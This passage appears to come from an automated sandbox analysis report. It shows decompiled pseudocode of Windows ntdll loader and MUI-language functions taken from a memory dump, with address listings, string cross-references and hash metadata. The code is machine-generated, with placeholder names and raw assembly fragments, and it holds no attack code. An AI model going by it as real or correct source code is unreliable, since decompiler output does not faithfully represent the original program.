						L28:
						if(E015F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01604620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0162F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01631370(_t276, 0x15c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0162BB40(0,  &_v68, _t170);
									if(L015F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0162BB40(_t257,  &_v68, _t243);
								if(L015F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01631370(_t278, 0x15c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01604620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0162F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01631370(_v16, 0x15c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0162BB40(_t262,  &_v68, _t244);
								if(L015F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01631370(_t282, 0x15c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0162BB40(_t262,  &_v68, _t201);
							if(L015F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01604620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0162F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01631370(_t280, 0x15c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0162BB40(_t267,  &_v68, _t245);
							if(L015F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01631370(_t284, 0x15c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0162BB40(_t267,  &_v68, _t224);
						if(L015F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                0x015f3d3c
                                                0x015f3d42
                                                0x015f3d44
                                                0x015f3d46
                                                0x015f3d49
                                                0x015f3d4c
                                                0x015f3d4f
                                                0x015f3d52
                                                0x015f3d55
                                                0x015f3d58
                                                0x015f3d5b
                                                0x015f3d5f
                                                0x015f3d61
                                                0x015f3d66
                                                0x01648213
                                                0x01648218
                                                0x015f4085
                                                0x015f4088
                                                0x015f408e
                                                0x015f4094
                                                0x015f409a
                                                0x015f40a0
                                                0x015f40a6
                                                0x015f40a9
                                                0x015f40af
                                                0x015f40b6
                                                0x015f40bd
                                                0x015f40bd
                                                0x015f3d83
                                                0x0164821f
                                                0x01648229
                                                0x01648238
                                                0x01648238
                                                0x0164823d
                                                0x0164823d
                                                0x015f3da0
                                                0x015f3daf
                                                0x015f3db5
                                                0x015f3dba
                                                0x015f3dba
                                                0x015f3dd4
                                                0x015f3e94
                                                0x015f3eab
                                                0x015f3f6d
                                                0x015f3f84
                                                0x015f406b
                                                0x015f406b
                                                0x015f406e
                                                0x015f406e
                                                0x015f4070
                                                0x015f4074
                                                0x01648351
                                                0x01648351
                                                0x015f407a
                                                0x015f407f
                                                0x0164835d
                                                0x01648370
                                                0x01648377
                                                0x01648379
                                                0x0164837c
                                                0x0164837c
                                                0x0164835d
                                                0x00000000
                                                0x015f407f
                                                0x015f3f8a
                                                0x015f3f8d
                                                0x015f3f90
                                                0x015f3f95
                                                0x0164830d
                                                0x0164830f
                                                0x015f3f9b
                                                0x015f3fac
                                                0x015f3fae
                                                0x015f3fb1
                                                0x015f3fb1
                                                0x015f3fb6
                                                0x01648317
                                                0x0164831a
                                                0x00000000
                                                0x015f3fbc
                                                0x015f3fc1
                                                0x015f3fc9
                                                0x015f3fd7
                                                0x015f3fda
                                                0x015f3fdd
                                                0x015f4021
                                                0x015f4021
                                                0x015f4029
                                                0x015f4030
                                                0x015f4044
                                                0x015f4046
                                                0x015f4046
                                                0x015f4044
                                                0x015f4049
                                                0x01648327
                                                0x01648334
                                                0x01648339
                                                0x0164833c
                                                0x015f404f
                                                0x015f404f
                                                0x015f404f
                                                0x015f4051
                                                0x015f4056
                                                0x015f4063
                                                0x015f4063
                                                0x015f4068
                                                0x00000000
                                                0x015f4068
                                                0x015f3fdf
                                                0x015f3fe2
                                                0x015f3fe4
                                                0x015f3fe7
                                                0x015f3fef
                                                0x015f4003
                                                0x015f4005
                                                0x015f4005
                                                0x015f400c
                                                0x015f4013
                                                0x015f4016
                                                0x015f4017
                                                0x015f401b
                                                0x015f401e
                                                0x00000000
                                                0x015f401e
                                                0x015f3fb6
                                                0x015f3eb1
                                                0x015f3eb4
                                                0x015f3eb7
                                                0x015f3ebc
                                                0x016482a9
                                                0x016482ab
                                                0x015f3ec2
                                                0x015f3ed3
                                                0x015f3ed5
                                                0x015f3ed8
                                                0x015f3ed8
                                                0x015f3edd
                                                0x016482b3
                                                0x016482b6
                                                0x00000000
                                                0x015f3ee3
                                                0x015f3ee8
                                                0x015f3eed
                                                0x015f3ef0
                                                0x015f3ef3
                                                0x015f3f02
                                                0x015f3f05
                                                0x015f3f08
                                                0x016482c0
                                                0x016482c3
                                                0x016482c5
                                                0x016482c8
                                                0x016482d0
                                                0x016482e4
                                                0x016482e6
                                                0x016482e6
                                                0x016482ed
                                                0x016482f4
                                                0x016482f7
                                                0x016482f8
                                                0x016482fc
                                                0x016482ff
                                                0x016482ff
                                                0x015f3f0e
                                                0x015f3f11
                                                0x015f3f16
                                                0x015f3f1d
                                                0x015f3f31
                                                0x01648307
                                                0x01648307
                                                0x015f3f31
                                                0x015f3f39
                                                0x015f3f48
                                                0x015f3f4d
                                                0x015f3f50
                                                0x015f3f50
                                                0x015f3f53
                                                0x015f3f58
                                                0x015f3f65
                                                0x015f3f65
                                                0x015f3f6a
                                                0x00000000
                                                0x015f3f6a
                                                0x015f3edd
                                                0x015f3dda
                                                0x015f3ddd
                                                0x015f3de0
                                                0x015f3de5
                                                0x01648245
                                                0x015f3deb
                                                0x015f3df7
                                                0x015f3dfc
                                                0x015f3dfe
                                                0x015f3e01
                                                0x015f3e01
                                                0x015f3e06
                                                0x0164824d
                                                0x0164824f
                                                0x01648254
                                                0x00000000
                                                0x015f3e0c
                                                0x015f3e11
                                                0x015f3e16
                                                0x015f3e19
                                                0x015f3e29
                                                0x015f3e2c
                                                0x015f3e2f
                                                0x0164825c
                                                0x0164825f
                                                0x01648261
                                                0x01648264
                                                0x0164826c
                                                0x01648280
                                                0x01648282
                                                0x01648282
                                                0x01648289
                                                0x01648290
                                                0x01648293
                                                0x01648294
                                                0x01648298
                                                0x0164829b
                                                0x0164829b
                                                0x015f3e35
                                                0x015f3e38
                                                0x015f3e3d
                                                0x015f3e44
                                                0x015f3e58
                                                0x016482a3
                                                0x016482a3
                                                0x015f3e58
                                                0x015f3e60
                                                0x015f3e6f
                                                0x015f3e74
                                                0x015f3e77
                                                0x015f3e77
                                                0x015f3e7a
                                                0x015f3e7f
                                                0x015f3e8c
                                                0x015f3e8c
                                                0x015f3e91
                                                0x00000000
                                                0x015f3e91

                                                Strings
                                                • Kernel-MUI-Number-Allowed, xrefs: 015F3D8C
                                                • Kernel-MUI-Language-Disallowed, xrefs: 015F3E97
                                                • Kernel-MUI-Language-Allowed, xrefs: 015F3DC0
                                                • WindowsExcludedProcs, xrefs: 015F3D6F
                                                • Kernel-MUI-Language-SKU, xrefs: 015F3F70
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: a568be04acc728e0293df566c19facfd01b8bb1a7b896ab39442b95982e24e55
                                                • Instruction ID: bf28d5d59ce87b49835d2e8dcdb13413ebe0184c05ba340af3a0b614fbacbcd6
                                                • Opcode Fuzzy Hash: a568be04acc728e0293df566c19facfd01b8bb1a7b896ab39442b95982e24e55
                                                • Instruction Fuzzy Hash: D7F13A72D00619EFDB16DFD8C980AEFBBB9FF58650F14406AE605AB250D7349E01CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01618E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E01618E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x16dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x16d8464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x16d5780 & 0x00000003) != 0) {
							E01665510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x16d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0162B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x16d7984; // 0x1182b70
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x16d8464; // 0x74e10110
					 *0x16db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01619B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x16d5780 & 0x00000005) != 0) {
						_push(_t49);
						E01665510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                0x01618e0f
                                                0x01618e16
                                                0x01618e19
                                                0x01618e1b
                                                0x01618e21
                                                0x01618e7f
                                                0x01618e85
                                                0x01659354
                                                0x0165936c
                                                0x01659371
                                                0x0165937b
                                                0x01659381
                                                0x01659381
                                                0x0165937b
                                                0x01618e9d
                                                0x01618e9d
                                                0x01618e29
                                                0x01618e2c
                                                0x01618e38
                                                0x01618e3e
                                                0x01618e43
                                                0x01618eb5
                                                0x01618eb9
                                                0x016592aa
                                                0x016592af
                                                0x016592e8
                                                0x016592e8
                                                0x016592af
                                                0x01618eb9
                                                0x01618e45
                                                0x01618e53
                                                0x01618e5b
                                                0x01618e5f
                                                0x01618e78
                                                0x01618e78
                                                0x01618e7d
                                                0x01618ec3
                                                0x01618ecd
                                                0x01618ed2
                                                0x01618ed2
                                                0x01618ec5
                                                0x01618ec5
                                                0x00000000
                                                0x01618e7d
                                                0x01618e67
                                                0x01618ea4
                                                0x0165931a
                                                0x00000000
                                                0x00000000
                                                0x01659320
                                                0x01618ea4
                                                0x01618e70
                                                0x01659325
                                                0x01659340
                                                0x01659345
                                                0x01659345
                                                0x01618e76
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Strings
                                                • LdrpFindDllActivationContext, xrefs: 01659331, 0165935D
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01659357
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0165933B, 01659367
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0165932A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 0-3779518884
                                                • Opcode ID: c05b3a888d35bb3672f05e693b1f2eb40568804a865dc34b6503b0eaf9a24d22
                                                • Instruction ID: 55a2f0cf2ea3c77ecb2744829906c95fff7720e1f05cfe5a950cb87770d87c8f
                                                • Opcode Fuzzy Hash: c05b3a888d35bb3672f05e693b1f2eb40568804a865dc34b6503b0eaf9a24d22
                                                • Instruction Fuzzy Hash: A2411832E00315DFEF36AA5C8C49A7ABABDBB41748F0E416DE9049765AE7705D8087C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E015F8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E015F934A() != 0) {
								_t159 = E0166A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x16d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01665510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x16d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E015F849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E015F8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E015F8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x16d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x16d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01602280(_t92, 0x16d86cc);
															_t94 = E016B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x16d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E015F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x16d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x16d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0162F380(_t136, 0x15c1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01602280(_t108, 0x16d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E016B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E015FFFB0(_t118, _t156, 0x16d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01629A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                0x015f8799
                                                0x015f879d
                                                0x015f87a1
                                                0x015f87a3
                                                0x015f87a8
                                                0x015f87c3
                                                0x015f87c3
                                                0x015f87c8
                                                0x015f87d1
                                                0x015f87d4
                                                0x015f87d8
                                                0x015f87e5
                                                0x015f87ec
                                                0x01649bfe
                                                0x01649c00
                                                0x01649c02
                                                0x01649c08
                                                0x01649c0d
                                                0x01649c0f
                                                0x01649c14
                                                0x01649c2d
                                                0x01649c32
                                                0x01649c37
                                                0x01649c3a
                                                0x01649c3c
                                                0x01649c42
                                                0x01649c42
                                                0x01649c3c
                                                0x01649c02
                                                0x015f87da
                                                0x015f87df
                                                0x015f87e3
                                                0x00000000
                                                0x00000000
                                                0x015f87e3
                                                0x015f87f2
                                                0x00000000
                                                0x015f87fb
                                                0x015f87fd
                                                0x015f87fe
                                                0x015f880e
                                                0x015f880f
                                                0x015f8810
                                                0x015f8814
                                                0x015f881a
                                                0x015f881c
                                                0x015f881f
                                                0x015f8821
                                                0x015f8822
                                                0x015f8824
                                                0x015f8826
                                                0x015f882c
                                                0x015f882e
                                                0x01649c48
                                                0x01649c48
                                                0x015f8834
                                                0x015f8834
                                                0x015f8837
                                                0x00000000
                                                0x00000000
                                                0x015f8837
                                                0x015f882e
                                                0x015f883d
                                                0x015f8840
                                                0x015f8843
                                                0x015f8846
                                                0x015f8849
                                                0x015f884c
                                                0x015f884e
                                                0x015f8850
                                                0x015f8852
                                                0x015f8854
                                                0x015f8857
                                                0x015f88b4
                                                0x015f88b6
                                                0x015f88b6
                                                0x015f8859
                                                0x015f8859
                                                0x015f8859
                                                0x015f8861
                                                0x015f8866
                                                0x015f886a
                                                0x015f893d
                                                0x015f8941
                                                0x00000000
                                                0x015f8947
                                                0x015f8947
                                                0x015f894a
                                                0x015f894c
                                                0x00000000
                                                0x015f8952
                                                0x015f8955
                                                0x015f895a
                                                0x015f895d
                                                0x015f895d
                                                0x015f895f
                                                0x015f8961
                                                0x015f8961
                                                0x015f8968
                                                0x00000000
                                                0x00000000
                                                0x015f896a
                                                0x015f896b
                                                0x015f896e
                                                0x00000000
                                                0x015f8970
                                                0x015f8970
                                                0x015f8970
                                                0x015f8970
                                                0x015f8972
                                                0x015f8972
                                                0x015f8974
                                                0x00000000
                                                0x015f897a
                                                0x015f897a
                                                0x015f897d
                                                0x00000000
                                                0x015f8983
                                                0x01649c65
                                                0x01649c6d
                                                0x01649c72
                                                0x01649c75
                                                0x01649c75
                                                0x01649c82
                                                0x01649c86
                                                0x01649c87
                                                0x01649c88
                                                0x01649c89
                                                0x01649c8c
                                                0x01649c90
                                                0x01649c95
                                                0x01649c97
                                                0x01649ca0
                                                0x01649ca3
                                                0x01649ca9
                                                0x01649ca9
                                                0x00000000
                                                0x01649ca9
                                                0x01649ca3
                                                0x00000000
                                                0x01649c97
                                                0x015f897d
                                                0x00000000
                                                0x015f8974
                                                0x015f8988
                                                0x015f8992
                                                0x015f8996
                                                0x00000000
                                                0x015f8996
                                                0x015f894c
                                                0x00000000
                                                0x015f8870
                                                0x015f887b
                                                0x015f887d
                                                0x015f887f
                                                0x015f8881
                                                0x015f8884
                                                0x015f8884
                                                0x015f8886
                                                0x015f8889
                                                0x015f888c
                                                0x015f888e
                                                0x015f8891
                                                0x015f8891
                                                0x015f8898
                                                0x00000000
                                                0x00000000
                                                0x015f889a
                                                0x015f889b
                                                0x015f889e
                                                0x00000000
                                                0x00000000
                                                0x015f88a0
                                                0x015f88a8
                                                0x015f88b0
                                                0x015f88b2
                                                0x015f88d3
                                                0x015f88d5
                                                0x00000000
                                                0x015f88d7
                                                0x015f88db
                                                0x015f88dc
                                                0x015f88e0
                                                0x015f88e8
                                                0x015f88ee
                                                0x015f88f0
                                                0x015f88f3
                                                0x015f88fc
                                                0x015f8901
                                                0x015f8906
                                                0x015f890c
                                                0x015f890c
                                                0x015f890f
                                                0x015f8916
                                                0x015f8917
                                                0x015f8918
                                                0x015f8919
                                                0x015f891a
                                                0x015f891f
                                                0x015f8921
                                                0x01649c52
                                                0x01649c55
                                                0x01649c5b
                                                0x01649cac
                                                0x01649cc0
                                                0x01649cc0
                                                0x01649c55
                                                0x015f8927
                                                0x015f8927
                                                0x015f892f
                                                0x015f8933
                                                0x00000000
                                                0x015f88f5
                                                0x015f88f5
                                                0x00000000
                                                0x015f88f7
                                                0x015f88f7
                                                0x015f88fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015f88fa
                                                0x015f88f5
                                                0x015f88f3
                                                0x00000000
                                                0x015f88d5
                                                0x00000000
                                                0x015f88b2
                                                0x015f88c9
                                                0x00000000
                                                0x015f88c9
                                                0x015f887f
                                                0x015f886a
                                                0x015f8857
                                                0x015f8852
                                                0x015f88bf
                                                0x015f88bf
                                                0x015f87aa
                                                0x015f87ad
                                                0x015f87ae
                                                0x015f87b4
                                                0x015f87b5
                                                0x015f87b6
                                                0x015f87b8
                                                0x015f87bd
                                                0x015f87c1
                                                0x015f87f4
                                                0x015f87fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015f87c1
                                                0x00000000

                                                Strings
